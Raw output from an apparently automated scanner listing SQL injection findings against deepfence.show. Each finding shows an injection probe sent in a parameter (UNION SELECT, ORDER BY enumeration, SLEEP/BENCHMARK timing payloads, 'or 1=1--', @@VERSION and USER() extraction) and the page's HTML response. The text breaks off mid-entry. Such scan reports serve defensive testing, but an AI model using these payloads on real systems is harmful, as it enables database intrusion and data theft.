href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1694\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1695\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# ORDER BY 1,SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1696\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ') or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1697\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 27#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1698\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 3--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1699\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1700\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# admin\" or 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1701\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1702\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '\\\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1703\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1704\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1705\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1706\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1707\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token 